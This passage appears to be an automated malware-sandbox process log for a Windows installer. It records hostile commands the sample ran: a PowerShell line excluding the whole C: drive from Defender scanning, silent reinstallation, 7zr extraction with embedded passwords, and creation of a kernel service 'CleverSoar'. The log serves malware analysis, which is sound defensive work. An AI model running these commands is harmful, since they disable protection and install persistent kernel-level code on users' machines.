                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:2
                                                                                                              Start time:02:38:21
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                              Imagebase:0x7ff63dcb0000
                                                                                                              File size:329'504 bytes
                                                                                                              MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:02:38:22
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                                                                                              Imagebase:0x980000
                                                                                                              File size:5'695'204 bytes
                                                                                                              MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:02:38:22
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:6
                                                                                                              Start time:02:38:22
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                                                                                              Imagebase:0x510000
                                                                                                              File size:3'366'912 bytes
                                                                                                              MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:02:38:23
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:8
                                                                                                              Start time:02:38:24
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                              Imagebase:0x110000
                                                                                                              File size:452'608 bytes
                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:02:38:24
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:02:38:25
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:11
                                                                                                              Start time:02:38:29
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                                                                                              Imagebase:0x980000
                                                                                                              File size:5'695'204 bytes
                                                                                                              MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Has exited:false

                                                                                                              Target ID:12
                                                                                                              Start time:02:38:30
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                                                                                              Imagebase:0x550000
                                                                                                              File size:3'366'912 bytes
                                                                                                              MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Target ID:13
                                                                                                              Start time:02:38:32
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff7fb730000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:14
                                                                                                              Start time:02:38:33
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:02:38:33
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:16
                                                                                                              Start time:02:38:33
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:17
                                                                                                              Start time:02:38:33
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                                                                              Imagebase:0x9b0000
                                                                                                              File size:831'200 bytes
                                                                                                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:02:38:33
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                                                                              Imagebase:0x9b0000
                                                                                                              File size:831'200 bytes
                                                                                                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:20
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:21
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:28
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:29
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:31
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:33
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:34
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:35
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:36
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:37
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:38
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:39
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:40
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:41
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:42
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:43
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:44
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:45
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:46
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:47
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:48
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:49
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:50
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:51
                                                                                                              Start time:02:38:36
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:52
                                                                                                              Start time:02:38:36
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:53
                                                                                                              Start time:02:38:36
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
